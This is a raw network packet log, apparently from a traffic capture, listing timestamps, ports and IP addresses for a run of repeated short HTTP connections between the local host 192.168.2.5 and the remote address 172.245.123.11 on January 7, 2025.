Jan 7, 2025 11:03:28.707861900 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.206713915 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.206789970 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.206820965 CET	50108	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.206851006 CET	50108	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.211601019 CET	80	50108	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.337321997 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.342241049 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.342422009 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.344556093 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.349394083 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.349451065 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.354239941 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.874355078 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.874480009 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:29.874483109 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.874516964 CET	50109	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:29.879302979 CET	80	50109	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.014209986 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.019133091 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.019217014 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.021231890 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.026024103 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.026092052 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.030832052 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.549503088 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.549628973 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.549654961 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.549700022 CET	50110	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.554414988 CET	80	50110	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.689501047 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.694399118 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.694498062 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.696604967 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.701376915 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:30.701445103 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:30.706305981 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.244743109 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.244877100 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.244883060 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.244921923 CET	50111	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.249598026 CET	80	50111	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.394592047 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.399379015 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.399458885 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.401582956 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.406528950 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.406579971 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.411645889 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.926682949 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.926742077 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:31.926789045 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.926845074 CET	50112	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:31.931632042 CET	80	50112	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.055819988 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.060647964 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.060725927 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.062737942 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.067483902 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.067626953 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.072403908 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.585803032 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.585828066 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.585891008 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.585933924 CET	50113	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.590737104 CET	80	50113	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.721971035 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.726996899 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.727124929 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.729106903 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.733880997 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:32.733952999 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:32.738759041 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.260466099 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.260608912 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.260811090 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.260863066 CET	50114	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.265450001 CET	80	50114	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.400300980 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.405134916 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.405205011 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.428402901 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.433209896 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:33.433269978 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:33.438081026 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641026974 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641055107 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641066074 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641077995 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641166925 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.641210079 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.641225100 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.641225100 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.641251087 CET	50115	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.646083117 CET	80	50115	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.770800114 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.775695086 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.775782108 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.777829885 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.782610893 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:34.782674074 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:34.787419081 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.284744978 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.284827948 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.284895897 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.284939051 CET	50116	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.289757967 CET	80	50116	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.410615921 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.415482998 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.415667057 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.417725086 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.422703981 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.422765970 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.427825928 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.968166113 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.968281984 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:35.968310118 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.968347073 CET	50117	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:35.973093987 CET	80	50117	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.098774910 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.104007006 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.104084015 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.106273890 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.111191034 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.111249924 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.116324902 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.632415056 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.632452011 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.632563114 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.632602930 CET	50118	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.637435913 CET	80	50118	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.772023916 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.778532982 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.778640032 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.780884027 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.787288904 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:36.787347078 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:36.792675972 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.297065020 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.297152996 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.297198057 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.297198057 CET	50119	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.301960945 CET	80	50119	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.426814079 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.431792974 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.435343027 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.437613010 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.442440987 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.443278074 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.448143005 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.931905031 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.931957960 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:37.932169914 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.932209969 CET	50120	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:37.940682888 CET	80	50120	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.066699028 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.071751118 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.071885109 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.073981047 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.078784943 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.078880072 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.083667994 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.582405090 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.582549095 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.582642078 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.582700014 CET	50121	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.587560892 CET	80	50121	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.708543062 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.713507891 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.713772058 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.715842962 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.720592976 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:38.720674038 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:38.725465059 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.249047995 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.249134064 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.249186039 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.249186993 CET	50122	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.253952980 CET	80	50122	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.378093004 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.382998943 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.383110046 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.385117054 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.392671108 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.392735958 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.398736000 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.917833090 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.917989016 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.918492079 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:39.918540001 CET	50123	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:39.924654961 CET	80	50123	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.050836086 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.055675030 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.055761099 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.057842016 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.062623978 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.062714100 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.067488909 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.576606035 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.576757908 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.577697992 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.577755928 CET	50124	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.581516027 CET	80	50124	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.712733984 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.717570066 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.717667103 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.719878912 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.725192070 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:40.725261927 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:40.730319977 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.226413012 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.226607084 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.226763010 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.227672100 CET	50125	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.232578993 CET	80	50125	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.414504051 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.419373035 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.419437885 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.422121048 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.426971912 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.427015066 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.431808949 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.941040993 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.941127062 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:41.941183090 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.941183090 CET	50126	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:41.945929050 CET	80	50126	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.066011906 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.070844889 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.070962906 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.072987080 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.077790022 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.077853918 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.082679987 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.581815004 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.582067013 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.582156897 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.582195044 CET	50127	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.586997986 CET	80	50127	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.706386089 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.711200953 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.711281061 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.713380098 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.718173981 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:42.718228102 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:42.723298073 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.230515957 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.230772018 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.230823994 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.230875015 CET	50128	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.235554934 CET	80	50128	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.362185955 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.366983891 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.367090940 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.369122982 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.373846054 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.373897076 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.378622055 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.883764029 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.883862972 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:43.883877039 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.883905888 CET	50129	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:43.889105082 CET	80	50129	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.051933050 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.056777954 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.056848049 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.059268951 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.064424992 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.064476013 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.073599100 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.565392971 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.565490961 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.565510035 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.565548897 CET	50130	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.570673943 CET	80	50130	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.689928055 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.695746899 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.695940971 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.697948933 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.703928947 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:44.703993082 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:44.709415913 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.213726997 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.213803053 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.213829994 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.213855982 CET	50131	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.219660044 CET	80	50131	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.346354961 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.351152897 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.353358984 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.355334044 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.360119104 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.361356020 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.366159916 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.873665094 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.873776913 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.873802900 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:45.873859882 CET	50132	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:45.878645897 CET	80	50132	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.005157948 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.009967089 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.013365984 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.015724897 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.020541906 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.021356106 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.026082993 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.508116961 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.508343935 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.508414984 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.511143923 CET	50133	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.515917063 CET	80	50133	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.716223955 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.721012115 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.721134901 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.723135948 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.727885008 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:46.728055000 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:46.732876062 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.253499985 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.253619909 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.253638983 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.253676891 CET	50134	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.258469105 CET	80	50134	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.378597975 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.383460999 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.383547068 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.385638952 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.390383005 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.390461922 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.395221949 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.939903021 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.940009117 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.940076113 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:47.940119982 CET	50135	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:47.944896936 CET	80	50135	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.067255974 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.072169065 CET	80	50136	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.072272062 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.074377060 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.079116106 CET	80	50136	172.245.123.11	192.168.2.5
